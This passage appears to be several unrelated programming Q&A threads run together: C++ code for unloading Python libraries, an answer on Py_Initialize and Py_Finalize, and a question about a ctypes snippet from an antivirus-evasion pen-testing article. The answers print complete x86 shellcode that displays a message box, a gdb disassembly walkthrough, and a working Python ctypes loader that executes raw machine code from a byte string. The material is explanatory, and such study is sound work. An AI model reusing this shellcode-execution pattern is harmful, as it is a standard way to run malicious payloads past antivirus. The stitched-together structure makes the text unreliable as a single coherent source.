int main()
{
    // do some preprocessing stuff...
    // store the list of loaded libraries now
    // any libraries that get added to the list from now on must be Python
    // libraries
    std::vector<std::string> loaded_libraries(list_loaded_libraries());
    std::size_t start_idx(loaded_libraries.size());
    void* pHandle = dlopen("/path/to/library/libpython2.7.so", RTLD_NOW | RTLD_GLOBAL);
    // Not implemented here: get the addresses of the Python function you need
    MyPy_Initialize(); // Needs to be defined somewhere above!
    MyPyRun_SimpleString("import numpy"); // Needs to be defined somewhere above!
    // ...
    MyPyFinalize(); // Needs to be defined somewhere above!
    // Now list the loaded libraries again and start manually unloading them
    // starting from the end
    loaded_libraries = list_loaded_libraries();
    // NB: this below assumes that start_idx != 0, which should always hold true
    for(std::size_t i(loaded_libraries.size()-1) ; i >= start_idx ; --i) {
        void* pHandle = dlopen(loaded_libraries[i].c_str(),
#ifdef WIN32
                               RTLD_NOW // no support for RTLD_NOLOAD
#else
                               RTLD_NOW|RTLD_NOLOAD
#endif /* WIN32 */
                               );
        if (pHandle) {
            const unsigned int Nmax(50); // Avoid getting stuck in an infinite loop
            for (unsigned int j(0) ; j < Nmax && !dlclose(pHandle) ; ++j);
        }
    }
}
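The bookkeeping in that loop (take a snapshot, load Python, take a second snapshot, unload whatever is new, last-loaded first) can also be written without relying on index positions. A small Python sketch of just that selection step follows. The function name and the sample paths are illustrative and not part of the original program, and it assumes the listing function returns libraries in load order.

```python
def libraries_to_unload(before, after):
    """Libraries present in `after` but not in `before`, most recently listed first."""
    already_loaded = set(before)
    added = [name for name in after if name not in already_loaded]
    return list(reversed(added))


# Hypothetical snapshots taken before and after "import numpy"
before = ["", "/lib/libc.so.6"]
after = ["", "/lib/libc.so.6", "/path/to/libpython2.7.so", "/path/to/multiarray.so"]
pending = libraries_to_unload(before, after)
```

Comparing by name rather than by index also sidesteps the unsigned-counter caveat noted in the C++ loop, since nothing is decremented past zero.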
Final words
The examples shown here capture the basic ideas behind my solution, but can certainly be improved to avoid global variables and facilitate ease of use (for example, I wrote a singleton class that handles the automatic initialization of all the function pointers after loading the Python library).
I hope this can be useful to someone in the future.
References
dl_iterate_phdr: https://linux.die.net/man/3/dl_iterate_phdr
PsAPI library: https://msdn.microsoft.com/en-us/library/windows/desktop/ms684894(v=vs.85).aspx
OpenProcess: https://msdn.microsoft.com/en-us/library/windows/desktop/ms684320(v=vs.85).aspx
EnumProcess: https://msdn.microsoft.com/en-us/library/windows/desktop/ms682629(v=vs.85).aspx
GetModuleFileNameEx: https://msdn.microsoft.com/en-us/library/windows/desktop/ms683198(v=vs.85).aspx
dlfcn-win32 library: https://github.com/dlfcn-win32/dlfcn-win32

I'm not quite sure how you don't seem to understand the solution posted in Py_initialize / Py_Finalize not working twice with numpy. The solution posted is quite simple: call Py_Initialize and Py_Finalize only once for each time your program executes. Do not call them every time you run the loop.
I assume that your program, when it starts, runs some initialization commands (which are only run once). Call Py_Initialize there. Never call it again. Also, I assume that when your program terminates, it has some code to tear down things, dump log files, etc. Call Py_Finalize there. Py_Initialize and Py_Finalize are not intended to help you manage memory in the Python interpreter. Do not use them for that, as they cause your program to crash. Instead, use Python's own functions to get rid of objects you don't want to keep.
If you really MUST create a new environment every time you run your code, you can use Py_NewInterpreter to create a sub-interpreter and Py_EndInterpreter to destroy that sub-interpreter later. They're documented near the bottom of the Python C API page. This works similarly to having a new interpreter, except that modules are not re-initialized each time a sub-interpreter starts.
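As a rough illustration of "use Python's own functions to get rid of objects", here is what the cleanup inside one loop iteration might look like on the Python side, with the interpreter staying alive the whole time. Workspace and run_iteration are hypothetical names for this sketch; the weak reference is only there to make the release observable.

```python
import gc
import weakref


class Workspace(object):
    """Stand-in for a large object created on each loop iteration."""

    def __init__(self, size):
        self.data = [0.0] * size


def run_iteration(size):
    workspace = Workspace(size)
    probe = weakref.ref(workspace)  # lets us observe when the object is freed
    total = sum(workspace.data)
    del workspace   # drop the only strong reference
    gc.collect()    # also clears reference cycles, if there are any
    return total, probe() is None


total, freed = run_iteration(1000)
```

From C, the same effect comes from releasing your references (Py_DECREF) and, if needed, running "import gc; gc.collect()" through the interpreter you already initialized.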

ctypes: Cast string to function?

I was reading the article Tips for Evading Anti-Virus During Pen Testing and was surprised by the following Python program:
from ctypes import *
shellcode = '\xfc\xe8\x89\x00\x00....'
memorywithshell = create_string_buffer(shellcode, len(shellcode))
shell = cast(memorywithshell, CFUNCTYPE(c_void_p))
shell()
The shellcode is shortened. Can someone explain what is going on? I'm familiar with both Python and C, and I've tried reading up on the ctypes module, but there are two main questions left:
What is stored in shellcode?
I know this has something to do with C (in the article it is shellcode from Metasploit, and a different notation for ASCII was chosen), but I cannot tell whether it's C source (probably not) or the output of some sort of compilation (which?).
Depending on the first question, what's the magic happening during the cast?

Have a look at this shellcode, which I took from here (it pops up a MessageBoxA):
#include <stdio.h>
typedef void (* function_t)(void);
unsigned char shellcode[] =
"\xFC\x33\xD2\xB2\x30\x64\xFF\x32\x5A\x8B"
"\x52\x0C\x8B\x52\x14\x8B\x72\x28\x33\xC9"
"\xB1\x18\x33\xFF\x33\xC0\xAC\x3C\x61\x7C"
"\x02\x2C\x20\xC1\xCF\x0D\x03\xF8\xE2\xF0"
"\x81\xFF\x5B\xBC\x4A\x6A\x8B\x5A\x10\x8B"
"\x12\x75\xDA\x8B\x53\x3C\x03\xD3\xFF\x72"
"\x34\x8B\x52\x78\x03\xD3\x8B\x72\x20\x03"
"\xF3\x33\xC9\x41\xAD\x03\xC3\x81\x38\x47"
"\x65\x74\x50\x75\xF4\x81\x78\x04\x72\x6F"
"\x63\x41\x75\xEB\x81\x78\x08\x64\x64\x72"
"\x65\x75\xE2\x49\x8B\x72\x24\x03\xF3\x66"
"\x8B\x0C\x4E\x8B\x72\x1C\x03\xF3\x8B\x14"
"\x8E\x03\xD3\x52\x33\xFF\x57\x68\x61\x72"
"\x79\x41\x68\x4C\x69\x62\x72\x68\x4C\x6F"
"\x61\x64\x54\x53\xFF\xD2\x68\x33\x32\x01"
"\x01\x66\x89\x7C\x24\x02\x68\x75\x73\x65"
"\x72\x54\xFF\xD0\x68\x6F\x78\x41\x01\x8B"
"\xDF\x88\x5C\x24\x03\x68\x61\x67\x65\x42"
"\x68\x4D\x65\x73\x73\x54\x50\xFF\x54\x24"
"\x2C\x57\x68\x4F\x5F\x6F\x21\x8B\xDC\x57"
"\x53\x53\x57\xFF\xD0\x68\x65\x73\x73\x01"
"\x8B\xDF\x88\x5C\x24\x03\x68\x50\x72\x6F"
"\x63\x68\x45\x78\x69\x74\x54\xFF\x74\x24"
"\x40\xFF\x54\x24\x40\x57\xFF\xD0";
void real_function(void) {
puts("I'm here");
}
int main(int argc, char **argv)
{
function_t function = (function_t) &shellcode[0];
real_function();
function();
return 0;
}
Compile it and run it under any debugger. I'll use gdb:
> gcc shellcode.c -o shellcode
> gdb -q shellcode.exe
Reading symbols from shellcode.exe...done.
(gdb)
>
Disassemble the main function to see the difference between calling real_function and function:
(gdb) disassemble main
Dump of assembler code for function main:
0x004013a0 <+0>: push %ebp
0x004013a1 <+1>: mov %esp,%ebp
0x004013a3 <+3>: and $0xfffffff0,%esp
0x004013a6 <+6>: sub $0x10,%esp
0x004013a9 <+9>: call 0x4018e4 <__main>
0x004013ae <+14>: movl $0x402000,0xc(%esp)
0x004013b6 <+22>: call 0x40138c <real_function> ; <- here we call our `real_function`
0x004013bb <+27>: mov 0xc(%esp),%eax
0x004013bf <+31>: call *%eax ; <- here we call the address that is loaded in eax (the address of the beginning of our shellcode)
0x004013c1 <+33>: mov $0x0,%eax
0x004013c6 <+38>: leave
0x004013c7 <+39>: ret
End of assembler dump.
(gdb)
There are two calls. Let's set a breakpoint at <main+31> to see what is loaded in eax:
(gdb) break *(main+31)
Breakpoint 1 at 0x4013bf
(gdb) run
Starting program: shellcode.exe
[New Thread 2856.0xb24]
I'm here
Breakpoint 1, 0x004013bf in main ()
(gdb) disassemble
Dump of assembler code for function main:
0x004013a0 <+0>: push %ebp
0x004013a1 <+1>: mov %esp,%ebp
0x004013a3 <+3>: and $0xfffffff0,%esp
0x004013a6 <+6>: sub $0x10,%esp
0x004013a9 <+9>: call 0x4018e4 <__main>
0x004013ae <+14>: movl $0x402000,0xc(%esp)
0x004013b6 <+22>: call 0x40138c <real_function>
0x004013bb <+27>: mov 0xc(%esp),%eax
=> 0x004013bf <+31>: call *%eax ; now we are here
0x004013c1 <+33>: mov $0x0,%eax
0x004013c6 <+38>: leave
0x004013c7 <+39>: ret
End of assembler dump.
(gdb)
Look at the first 3 bytes of the data at the address held in eax:
(gdb) x/3x $eax
0x402000 <shellcode>: 0xfc 0x33 0xd2
(gdb) ^-------^--------^---- the first 3 bytes of the shellcode
So the CPU will call 0x402000, which is the beginning of our shellcode. Let's disassemble whatever is at 0x402000:
(gdb) disassemble 0x402000
Dump of assembler code for function shellcode:
0x00402000 <+0>: cld
0x00402001 <+1>: xor %edx,%edx
0x00402003 <+3>: mov $0x30,%dl
0x00402005 <+5>: pushl %fs:(%edx)
0x00402008 <+8>: pop %edx
0x00402009 <+9>: mov 0xc(%edx),%edx
0x0040200c <+12>: mov 0x14(%edx),%edx
0x0040200f <+15>: mov 0x28(%edx),%esi
0x00402012 <+18>: xor %ecx,%ecx
0x00402014 <+20>: mov $0x18,%cl
0x00402016 <+22>: xor %edi,%edi
0x00402018 <+24>: xor %eax,%eax
0x0040201a <+26>: lods %ds:(%esi),%al
0x0040201b <+27>: cmp $0x61,%al
0x0040201d <+29>: jl 0x402021 <shellcode+33>
....
As you can see, shellcode is nothing more than machine instructions. The only difference is in the way these instructions are written: shellcode uses special techniques to stay portable, for example never relying on a fixed address.
The Python equivalent of the above program:
#!python
from ctypes import *
shellcode_data = "\
\xFC\x33\xD2\xB2\x30\x64\xFF\x32\x5A\x8B\
\x52\x0C\x8B\x52\x14\x8B\x72\x28\x33\xC9\
\xB1\x18\x33\xFF\x33\xC0\xAC\x3C\x61\x7C\
\x02\x2C\x20\xC1\xCF\x0D\x03\xF8\xE2\xF0\
\x81\xFF\x5B\xBC\x4A\x6A\x8B\x5A\x10\x8B\
\x12\x75\xDA\x8B\x53\x3C\x03\xD3\xFF\x72\
\x34\x8B\x52\x78\x03\xD3\x8B\x72\x20\x03\
\xF3\x33\xC9\x41\xAD\x03\xC3\x81\x38\x47\
\x65\x74\x50\x75\xF4\x81\x78\x04\x72\x6F\
\x63\x41\x75\xEB\x81\x78\x08\x64\x64\x72\
\x65\x75\xE2\x49\x8B\x72\x24\x03\xF3\x66\
\x8B\x0C\x4E\x8B\x72\x1C\x03\xF3\x8B\x14\
\x8E\x03\xD3\x52\x33\xFF\x57\x68\x61\x72\
\x79\x41\x68\x4C\x69\x62\x72\x68\x4C\x6F\
\x61\x64\x54\x53\xFF\xD2\x68\x33\x32\x01\
\x01\x66\x89\x7C\x24\x02\x68\x75\x73\x65\
\x72\x54\xFF\xD0\x68\x6F\x78\x41\x01\x8B\
\xDF\x88\x5C\x24\x03\x68\x61\x67\x65\x42\
\x68\x4D\x65\x73\x73\x54\x50\xFF\x54\x24\
\x2C\x57\x68\x4F\x5F\x6F\x21\x8B\xDC\x57\
\x53\x53\x57\xFF\xD0\x68\x65\x73\x73\x01\
\x8B\xDF\x88\x5C\x24\x03\x68\x50\x72\x6F\
\x63\x68\x45\x78\x69\x74\x54\xFF\x74\x24\
\x40\xFF\x54\x24\x40\x57\xFF\xD0"
shellcode = c_char_p(shellcode_data)
function = cast(shellcode, CFUNCTYPE(None))
function()

shellcode, if I'm not mistaken, contains architecture-specific compiled code that roughly translates as a function call. (I'm not an architecture expert, and the code is truncated...)
Therefore, once you've created a C-style string with create_string_buffer, you can then fool Python into thinking that it is a function with the cast call. Python then executes the code originally contained in shellcode.
There's a helpful link here: http://www.blackhatlibrary.net/Python#Ctypes
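To see that the cast itself is nothing magical, here is a harmless sketch that does the same "treat this address as a function" step with an ordinary callback instead of shellcode. The names INT_TO_INT and double_it are made up for the example. It relies only on documented ctypes behaviour: a CFUNCTYPE prototype can wrap a Python callable, and it can also be called with an integer address.

```python
import ctypes

# Prototype for "int f(int)". CFUNCTYPE builds a C function-pointer type.
INT_TO_INT = ctypes.CFUNCTYPE(ctypes.c_int, ctypes.c_int)


def double_it(value):
    return 2 * value


# ctypes generates a small native thunk so that C code could call double_it.
# Keep this object alive for as long as the raw address is in use.
callback = INT_TO_INT(double_it)

# Take the raw address of that thunk as a plain integer...
address = ctypes.cast(callback, ctypes.c_void_p).value

# ...and tell ctypes to treat whatever lives at that address as "int f(int)".
rebuilt = INT_TO_INT(address)

result = rebuilt(21)
```

ctypes does not check what is actually stored at the address. It only records the calling convention and argument types, which is why the snippet in the question can point it at a byte string.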

Let us not forget that in order to have executable code, it has to be converted to a format that your machine understands. What you are doing there is providing a sequence of machine-code bytes that your CPU can execute directly, so you can tell your machine to run it. You are effectively skipping the job of a compiler by providing the final bytes; Just-In-Time compilers use the same technique, since they have to create executable code while the program is running.
So this actually has little to no relation to C (or Python, or any other language), but a great deal to do with the details of the architecture this code is expected to run on.
The first byte there is CLD (0xfc), followed by a CALL instruction (0xe8), which makes execution jump to an address computed from the offset given in the next 4 bytes of the sequence, and so on.
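The offset arithmetic can be checked by hand. The sketch below decodes a CLD followed by a CALL with a 32-bit relative offset and computes where the call would land. The six bytes are illustrative values chosen for the example, not the truncated sequence from the question, and decode_cld_call is a made-up helper name.

```python
import struct

# Illustrative bytes only: CLD, then CALL with a relative offset of 0x10.
code = b"\xfc\xe8\x10\x00\x00\x00"


def decode_cld_call(blob, base=0):
    """Decode a leading CLD + CALL rel32 pair and return the CALL target address."""
    if blob[0:1] != b"\xfc":
        raise ValueError("expected CLD (0xfc)")
    if blob[1:2] != b"\xe8":
        raise ValueError("expected CALL rel32 (0xe8)")
    # The offset is a little-endian signed 32-bit integer.
    (offset,) = struct.unpack("<i", blob[2:6])
    # It is relative to the instruction after the CALL:
    # 1 byte for CLD plus 5 bytes for CALL.
    next_instruction = base + 6
    return next_instruction + offset


target = decode_cld_call(code)  # 6 + 0x10 = 22
```

Because the offset is relative to the next instruction rather than an absolute address, the same bytes work wherever they are loaded. With base=0x402000, for instance, the target becomes 0x402016.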
